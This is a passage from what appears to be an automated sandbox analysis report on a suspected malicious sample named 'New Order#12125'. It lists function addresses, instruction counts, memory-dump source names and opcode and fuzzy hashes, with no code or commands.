                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d150693ef1e4c635eb1f24eb1ee4c206ab2b8ec83845be019e0029940e3d6f30
                                                                        • Instruction ID: 046468905c6c33368e736075b0462efb749951b78f4edcf561a3e518c898f852
                                                                        • Opcode Fuzzy Hash: d150693ef1e4c635eb1f24eb1ee4c206ab2b8ec83845be019e0029940e3d6f30
                                                                        • Instruction Fuzzy Hash: 3032B676E0122ADBDF24DF98C890BAEBBB5FF55714F180029E905AF391E7359901CB90
                                                                        Function 01598158 Relevance: .6, Instructions: 617COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4379a8e4195f6ff758f7e06eba4c2b87d2de6e8e384a22c489cf289eac55a8bb
                                                                        • Instruction ID: 0ae25307df3be4edf79cd3f61743448a0aed3ede6f5b12825f4c38bb95acfa6c
                                                                        • Opcode Fuzzy Hash: 4379a8e4195f6ff758f7e06eba4c2b87d2de6e8e384a22c489cf289eac55a8bb
                                                                        • Instruction Fuzzy Hash: A6426C75A102198FEF24CF69C881BADBBF5BF89300F148099E949EF242D7349985CF61
                                                                        Function 01512840 Relevance: .6, Instructions: 605COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c91944ff5ba4db25558f6fb910fa3e5900cb38365bac9bedfe3a92c5f1e08ff7
                                                                        • Instruction ID: 9be7250a015c764e029af6eb3a1f0d24144e90d6dfbe8ad4b6af47a43965145f
                                                                        • Opcode Fuzzy Hash: c91944ff5ba4db25558f6fb910fa3e5900cb38365bac9bedfe3a92c5f1e08ff7
                                                                        • Instruction Fuzzy Hash: D032EE70A007568FEB25CF69C8547BEBBFABF84704F24851DD4869F285DB35A842CB90
                                                                        Function 015AA118 Relevance: .6, Instructions: 591COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ee6ac6a24f5f8e9c05174a589e351e660c377719e2704e9f36d22662a1d0aa5
                                                                        • Instruction ID: cce7ad0b29acf41714b1fc4d2140b9ccaa7183d88a591504ee5170aeb67072e6
                                                                        • Opcode Fuzzy Hash: 3ee6ac6a24f5f8e9c05174a589e351e660c377719e2704e9f36d22662a1d0aa5
                                                                        • Instruction Fuzzy Hash: DC22C3706446618FEB25CF2DC09477EBBF1BF44300F88885AE9968F286E775E452DB60
                                                                        Function 015C16CC Relevance: .6, Instructions: 571COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f087c4bc9e1c10061a0905cf060ae76759aae9684fd05665376aa93c56e71780
                                                                        • Instruction ID: 2892532fab3475fbd2115a6f85dccb81167e0567258f571953d8ca3d4bb3812a
                                                                        • Opcode Fuzzy Hash: f087c4bc9e1c10061a0905cf060ae76759aae9684fd05665376aa93c56e71780
                                                                        • Instruction Fuzzy Hash: 2D22CD35A00616CFDB19CF98C4D0AAEB7F2BF88704B24856DD9559F346EB30A942CB90
                                                                        Function 0152FB80 Relevance: .6, Instructions: 559COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eb3bc0f3f87ee402fe4af8a4fe12537d2c122b36a27bddbf37d46e521ad56a63
                                                                        • Instruction ID: 97371fc372d5bebd631d772a3e79c7e0e6bd423045209e1358255f94084bae54
                                                                        • Opcode Fuzzy Hash: eb3bc0f3f87ee402fe4af8a4fe12537d2c122b36a27bddbf37d46e521ad56a63
                                                                        • Instruction Fuzzy Hash: 6D22B3719002069FEB11DFA8D881BAEB7F5FF85300F248569E915DF286E734EA45CB90
                                                                        Function 01528DBF Relevance: .6, Instructions: 554COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6953cf00520962d8a1da678207d18f65eea9bd4d9fc45966f6d518e077d6960b
                                                                        • Instruction ID: 823dede5f7262a43ad511af7a77b89d17095e398d796ed1004bd091852e1578c
                                                                        • Opcode Fuzzy Hash: 6953cf00520962d8a1da678207d18f65eea9bd4d9fc45966f6d518e077d6960b
                                                                        • Instruction Fuzzy Hash: 8E224071E0012ADBCB15CF99C4809BEFBF6BF49314B18845AE995AF241E774ED41CBA0
                                                                        Function 01506A50 Relevance: .5, Instructions: 548COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a13f7a6b2e5115303cc852ea454602ae5feb4540d7ce010bb83f9496fa39798d
                                                                        • Instruction ID: ae8a95426480fdcf30478e2506cb007f298a71e4a2e3712ebd5c8616a7354f4a
                                                                        • Opcode Fuzzy Hash: a13f7a6b2e5115303cc852ea454602ae5feb4540d7ce010bb83f9496fa39798d
                                                                        • Instruction Fuzzy Hash: 59326B71A00615CFDB26CFA9C480AAEBBF5FF88310F144569E956AF391D734E851CB90
                                                                        Function 015C2446 Relevance: .5, Instructions: 485COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12a8168d9856be1041a064ea0ee00b3d6d25d368fee6717bbb04b96f0686989e
                                                                        • Instruction ID: f87804107a2d117ed0a348230bf99bf0b6140aeeeb4e6c06f4e67ddd57f93df9
                                                                        • Opcode Fuzzy Hash: 12a8168d9856be1041a064ea0ee00b3d6d25d368fee6717bbb04b96f0686989e
                                                                        • Instruction Fuzzy Hash: CF02D0346046518FD724CFAEC4902BABBF1BF95B00F15859EE996CF282D734D882DB60
                                                                        Function 01555630 Relevance: .5, Instructions: 458COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                        • Instruction ID: ffb0d5ffaedd461392ff03f0fc5286a20521a18151f0aafea998c91714caa2ef
                                                                        • Opcode Fuzzy Hash: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                        • Instruction Fuzzy Hash: FDD14573B6471C4FC384DE6EDC82381B2D2ABD4528B5D843C9D18CB303F669E91E6688
                                                                        Function 015C41A2 Relevance: .5, Instructions: 452COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d5b4900055d4ebee09f962b0a9a82bbb1828d1d445910267d8cc0171f93e030
                                                                        • Instruction ID: f8136454d9641b4ad839281363407a603df96885268dd533ece6a62b181cfe09
                                                                        • Opcode Fuzzy Hash: 1d5b4900055d4ebee09f962b0a9a82bbb1828d1d445910267d8cc0171f93e030
                                                                        • Instruction Fuzzy Hash: 8702AE71E00219CFCB05CF98C4A0AADFBB2FF98714F29856DD956AB355D730A982CB50
                                                                        Function 015DB16B Relevance: .4, Instructions: 450COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e9b6151b1f9f721e835784c3e5634c9b11ab46ff9aa53b248207e4a402bfb734
                                                                        • Instruction ID: 7a20a4be492b94e22cf220907cf68c7034cb718c9c70ed6ec43feff22b06a5cd
                                                                        • Opcode Fuzzy Hash: e9b6151b1f9f721e835784c3e5634c9b11ab46ff9aa53b248207e4a402bfb734
                                                                        • Instruction Fuzzy Hash: ECF1E572E006118BDF28CFADC99067EBBF6BF9921071A416DD856DF381E634EA41CB50
                                                                        Function 015DA9A6 Relevance: .4, Instructions: 425COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 23f8decfc9e584b4d7d8fc59ec412b89f20e0b8bff8903a084d267bb1893188e
                                                                        • Instruction ID: 38f8ee7948702ce56f495630ede3029d3947911be84cab21950a4675ae05f49c
                                                                        • Opcode Fuzzy Hash: 23f8decfc9e584b4d7d8fc59ec412b89f20e0b8bff8903a084d267bb1893188e
                                                                        • Instruction Fuzzy Hash: 42F1C472E005269BDB29CE6CC5A05BEFBF5BF54210B194269D856EF380E734EE41CB90
                                                                        Function 01524A35 Relevance: .4, Instructions: 423COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction ID: 8caeac54bddd4d27562c8eefbea2cf895931ac904d0af4c1d5c3b983668be45a
                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction Fuzzy Hash: 83F14172E0022A9BDF19CF99D590BAEBBF5BF45710F048529E905EF284E774D841CBA0
                                                                        Function 015B2F30 Relevance: .4, Instructions: 412COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd086c6ddae00804a4f2d0592b44cf699c22e39399456857b64f407947607d6f
                                                                        • Instruction ID: 7d5ade80e011b029346c92619e348353ca82f4146d5f78e34c95a9b9b63093bb
                                                                        • Opcode Fuzzy Hash: dd086c6ddae00804a4f2d0592b44cf699c22e39399456857b64f407947607d6f
                                                                        • Instruction Fuzzy Hash: 6AE1D135A042869FDB25CFACD4817FEBBF1BF48310F18841AD496AF281D675A989CB50
                                                                        Function 0159892B Relevance: .4, Instructions: 386COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b12616084b57dc487b660da68a4ecef9db4801d62159fad8196d070af7b2587e
                                                                        • Instruction ID: 41873c6b16e154bd4b35635d2440092c1f264cabf9a5a183d9f17a0ee646d97f
                                                                        • Opcode Fuzzy Hash: b12616084b57dc487b660da68a4ecef9db4801d62159fad8196d070af7b2587e
                                                                        • Instruction Fuzzy Hash: 30D10371A0060E8BDF05CF68C841AFEB7F2BF89314F188169D955EB241E739E905CB61
                                                                        Function 015065D0 Relevance: .4, Instructions: 383COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed324aa4679f641ccd2a2bfa834deec9cf11c49d8c348b9dbce1054357b4db93
                                                                        • Instruction ID: 0d9131402934a3a1194f830eb4b5ec7e6497d94cc01f9b4461374dd161f5dfe2
                                                                        • Opcode Fuzzy Hash: ed324aa4679f641ccd2a2bfa834deec9cf11c49d8c348b9dbce1054357b4db93
                                                                        • Instruction Fuzzy Hash: 83E19F71608342CFC716CF68C490A6EBBE0FF89314F15896DE9958B391EB31E915CB92
                                                                        Function 014F8397 Relevance: .4, Instructions: 380COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f1b6a0843d624c376336854b5ae087b8682506089133fd8aa38d62409e021c9a
                                                                        • Instruction ID: 4da0cf523f03bffc0f17ebd77fad5589ebb4159670ad380855193d7e0b875fd9
                                                                        • Opcode Fuzzy Hash: f1b6a0843d624c376336854b5ae087b8682506089133fd8aa38d62409e021c9a
                                                                        • Instruction Fuzzy Hash: 94D1B071A0060B9BDB14DF69C891ABF77E5BF54204F14462EEA16DF3A0E730E951CB60
                                                                        Function 0152C6E0 Relevance: .4, Instructions: 367COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 084681640b7418215a2f6a31a5785a4dff09216cff1726e7b5f3a314be399340
                                                                        • Instruction ID: 9199f73095a7d4b7a1a942392a56321e97e38802f8e8fa6e907d9e6c5e399d0b
                                                                        • Opcode Fuzzy Hash: 084681640b7418215a2f6a31a5785a4dff09216cff1726e7b5f3a314be399340
                                                                        • Instruction Fuzzy Hash: 2ED17037E041298BEB29CF9CC5453BDBBB5FB46310F18842AD946AF2C6C7B49941CB85
                                                                        Function 015138E0 Relevance: .3, Instructions: 349COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15f7ebcc7d80aea7784e508e2aba21020b29fa95bd435d693020b52e53de08a3
                                                                        • Instruction ID: 4f1428009f2091816842bb384f87abaf03b93f18b67eb8efbb40b41b1f00dfb6
                                                                        • Opcode Fuzzy Hash: 15f7ebcc7d80aea7784e508e2aba21020b29fa95bd435d693020b52e53de08a3
                                                                        • Instruction Fuzzy Hash: F3E18A75A00205CFDB19CF59C890AAEBBF5FF48320F1581A9E956EB395D730EA41CB90
                                                                        Function 0151CFE0 Relevance: .3, Instructions: 345COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cd7cbb110e27f9e571f8367c5f90dc5357c72d4d555174489e8ec171883c6ef3
                                                                        • Instruction ID: 6d4f0ad017ae50906fcc88463ae2e0ffdf4ace5cf6d0c081fa46aa8cefbed67f
                                                                        • Opcode Fuzzy Hash: cd7cbb110e27f9e571f8367c5f90dc5357c72d4d555174489e8ec171883c6ef3
                                                                        • Instruction Fuzzy Hash: 18D1D731A4031A8FFB36DB98C898BAEB7B1BB85304F0540ADD9099F249D774AD85CF51
                                                                        Function 015D95C3 Relevance: .3, Instructions: 326COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5937641932c24a237b4e6e162a53d5b414ca7e5ee81d488ad8839bea39f7d265
                                                                        • Instruction ID: 5f45a5f3b8580d0ecf457915d6f65b39c3bbdb0948051ab2f22ce7863acc1e37
                                                                        • Opcode Fuzzy Hash: 5937641932c24a237b4e6e162a53d5b414ca7e5ee81d488ad8839bea39f7d265
                                                                        • Instruction Fuzzy Hash: 75B189B19101266FFB358B68DC55FFFB6ACFB44754F044299B919EA1C0DB709E808B60
                                                                        Function 01588243 Relevance: .3, Instructions: 322COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction ID: 2aba304008bc9bdbe34d794c7a11a492e878ea9a2e7c8ae69b32b10c6db0ed6d
                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction Fuzzy Hash: A9B16475A00609AFDB24EF99C940EBFBBB5FF84304F94445DAA42BB791DA34E905CB10
                                                                        Function 01510535 Relevance: .3, Instructions: 300COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                        • Instruction ID: 243f4d1f7b6c5cd0787226e025784f138a68fb112d530530868109f33b9356fa
                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                        • Instruction Fuzzy Hash: ADB1D431604646AFEB26DB68C850BBEBBFABF84310F150559E6529F385D730ED81CB90
                                                                        Function 015083C0 Relevance: .3, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b66d7fd3ae6294953e9237e759af3635fa80461131e97c0b39d538edacfcdfe7
                                                                        • Instruction ID: 598b303679440087f99f34381abffb56e621f6c17f14e205fbdd8b6e98085874
                                                                        • Opcode Fuzzy Hash: b66d7fd3ae6294953e9237e759af3635fa80461131e97c0b39d538edacfcdfe7
                                                                        • Instruction Fuzzy Hash: 15C167705083418FE765CF19C494BAFBBE9BF88304F44496DE9898B291E775E908CF92
                                                                        Function 014FC427 Relevance: .3, Instructions: 280COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4198b693acb82ab4b2331f0cbca23ef437f42286ffb38d9964dd017ce237468d
                                                                        • Instruction ID: ff39ca782b6c576554dc0d9459e8bdcd92cae19b379ea7e3ddadd5022cd1e30d
                                                                        • Opcode Fuzzy Hash: 4198b693acb82ab4b2331f0cbca23ef437f42286ffb38d9964dd017ce237468d
                                                                        • Instruction Fuzzy Hash: 72B17470A0026A8BDB64DF59C890BADB7B1FF44704F0485EED64ADB351EB709D86CB24
                                                                        Function 0152E5E7 Relevance: .3, Instructions: 278COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 157ef845c9a36e38f9bf58662a0beda5337a7fe00cf1e010b0998213a0ed1321
                                                                        • Instruction ID: a8a5c0254cc95cbca1c248967be45246696d2f85af1c13be57add6f3f71e08f9
                                                                        • Opcode Fuzzy Hash: 157ef845c9a36e38f9bf58662a0beda5337a7fe00cf1e010b0998213a0ed1321
                                                                        • Instruction Fuzzy Hash: 70A14732E006669FEB31DB58E855BAEBBB8FB42714F050116EA10AF2D0D774AD40CBD0
                                                                        Function 01540185 Relevance: .3, Instructions: 276COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ff7846ce8ac95a1569c3fd794087d2d63dc55ef358a01a99515e67539c190c2
                                                                        • Instruction ID: 40407a68e16a3d57bd33403c818c65232a815d2f2d8f7d5ccfe4eaeb17f0cc86
                                                                        • Opcode Fuzzy Hash: 6ff7846ce8ac95a1569c3fd794087d2d63dc55ef358a01a99515e67539c190c2
                                                                        • Instruction Fuzzy Hash: ECA1BF70B006169BDB25DF69D991BAEB7B1FF44318F204529EB059F2C1DB34E811DBA0
                                                                        Function 015D4500 Relevance: .3, Instructions: 275COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1bf38e88e99af27ac670c25d8be9aa46d98a6ec52564cbd6f9b58697d128eadc
                                                                        • Instruction ID: 820477ce33f7416bc3f4aa0512586e6c91e6305e6c9bf7806094ac6300004eb7
                                                                        • Opcode Fuzzy Hash: 1bf38e88e99af27ac670c25d8be9aa46d98a6ec52564cbd6f9b58697d128eadc
                                                                        • Instruction Fuzzy Hash: FBA1CC72A10652EFD722DF18C980B6ABBE9FF88744F45092CE589DFA51D334E801CB91
                                                                        Function 015D2B57 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction ID: 2a17511e97204639fb092566795ea0d2fbe16710fae92bbcbbdd0bd70389a74c
                                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction Fuzzy Hash: D0B11771E0061ADFDF29DFADC880AADBBB5FF88310F148169E915AB354D730A945CB90
                                                                        Function 015860E0 Relevance: .3, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3cebd8a924cbf5beac7ba7bf4e4d4ce36ba619a75e229d452632e1715176d46b
                                                                        • Instruction ID: 0a4fd0f979523092ba79f62ef5b711bd72176d17f6a3b3b3d444183264040edc
                                                                        • Opcode Fuzzy Hash: 3cebd8a924cbf5beac7ba7bf4e4d4ce36ba619a75e229d452632e1715176d46b
                                                                        • Instruction Fuzzy Hash: 16919F71E00216AFDB15EFA8D884BAEBFB5BB49710F154169E611BF341DB34E9008BA0
                                                                        Function 0151E3F0 Relevance: .3, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
